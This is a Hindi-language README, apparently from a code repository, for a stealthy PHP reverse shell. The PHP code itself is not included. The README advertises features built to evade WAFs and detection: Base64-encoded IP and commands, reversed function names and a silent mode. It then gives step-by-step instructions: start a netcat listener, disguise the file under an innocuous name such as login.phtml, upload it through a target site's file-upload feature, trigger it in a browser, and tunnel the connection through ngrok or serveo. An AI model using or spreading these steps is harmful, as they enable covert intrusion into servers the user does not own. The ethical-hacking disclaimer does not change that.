
यह एक शक्तिशाली और गुप्त PHP रिवर्स शेल है जो एथिकल हैकिंग और पेनिट्रेशन टेस्टिंग के लिए डिज़ाइन किया गया है। यह आपकी मशीन पर एक विश्वसनीय और शांत कनेक्शन स्थापित करता है।
यह एक शक्तिशाली और गुप्त PHP रिवर्स शेल है जो एथिकल हैकिंग और पेनिट्रेशन टेस्टिंग के लिए डिज़ाइन किया गया है। यह आपकी मशीन पर एक विश्वसनीय और शांत कनेक्शन स्थापित करता है।
यह PHP रिवर्स शेल केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए विकसित किया गया है।
डेवलपर इस रिवर्स_शेल के उपयोग से होने वाले किसी भी दुरुपयोग, क्षति या अवैध गतिविधि के लिए जिम्मेदार नहीं है।
जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अनधिकृत पहुंच अवैध है और कानून द्वारा दंडनीय है।
IP और शेल कमांड स्टील्थ के लिए Base64 एन्कोडेड हैं
फ़ंक्शन नाम WAF और सुरक्षा फ़िल्टर को बायपास करने के लिए उल्टे किए गए हैं
साइलेंट मोड — पहचान से बचने के लिए कोई आउटपुट प्रदर्शित नहीं होता
यदि कनेक्शन ड्रॉप होता है तो स्वचालित रूप से पुनः कनेक्ट होता है
बैकग्राउंड डेमॉन के रूप में चल सकता है (यदि सर्वर सपोर्ट करता है)
अधिकांश PHP-सक्षम सर्वर पर काम करता है
Ngrok, Serveo जैसी टनलिंग सेवाओं का समर्थन करता है
कुछ फ़िल्टर को बायपास करने के लिए .phtml एक्सटेंशन के साथ अपलोड करें
1. अपनी मशीन पर एक लिसनर शुरू करें
nc -lvnp 4444
2. अपने IP या होस्टनाम को Base64 में एन्कोड करें
इस सरल कमांड का उपयोग करें:
echo "your_ip_or_hostname" | base64
उदाहरण:
echo "192.168.1.5" | base64
आउटपुट कॉपी करें और PHP रिवर्स शेल स्क्रिप्ट में $ip_b64 वैल्यू को बदलें।
3. अपनी PHP रिवर्स शेल स्क्रिप्ट अपडेट करें:
इन पंक्तियों को अपने Base64 एन्कोडेड IP/होस्टनाम और पोर्ट से बदलें:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. फ़ाइल का नाम बदलें और अपलोड करें
फ़ाइल का नाम कम संदिग्ध कुछ रखें, उदाहरण के लिए:
login.phtml
avatar.phtml
update.phtml
.phtml एक्सटेंशन का उपयोग करने से फ़ाइल कुछ सर्वरों पर चलने में मदद करता है जो .php को ब्लॉक करते हैं।
इस फ़ाइल को लक्ष्य वेबसाइट पर अपलोड करें जहाँ फ़ाइल अपलोड की अनुमति है।
5. रिवर्स शेल ट्रिगर करें
अपलोड की गई फ़ाइल को ब्राउज़र में खोलें:
http://target.com/uploads/login.phtml
एक बार खोलने पर, आपका लिसनर एक रिवर्स शेल कनेक्शन प्राप्त करेगा।
यदि आप मोबाइल डेटा का उपयोग कर रहे हैं या राउटर (NAT) के पीछे हैं, तो आपका IP सार्वजनिक नहीं हो सकता। उस स्थिति में, रिवर्स शेल सीधे आपकी मशीन तक नहीं पहुँच सकता।
इसे ठीक करने के लिए, Ngrok या Serveo जैसे TCP टनलिंग टूल का उपयोग करें।
Ngrok इंस्टॉल करें
यह कमांड चलाएँ:
ngrok tcp 4444
यह कुछ इस तरह दिखाएगा:
Forwarding tcp://4.tcp.ngrok.io:18900
अपनी PHP रिवर्स शेल स्क्रिप्ट अपडेट करें:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
अपना लिसनर शुरू करें:
nc -lvnp 4444
यह कमांड चलाएँ:
ssh -R 0:localhost:4444 serveo.net
यह कुछ इस तरह कहेगा:
Forwarding TCP connections from serveo.net:46603
अपनी PHP रिवर्स शेल स्क्रिप्ट अपडेट करें:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
अपना लिसनर शुरू करें:
nc -lvnp 4444
यह प्रोजेक्ट GNU जनरल पब्लिक लाइसेंस v3.0 के तहत लाइसेंस प्राप्त है।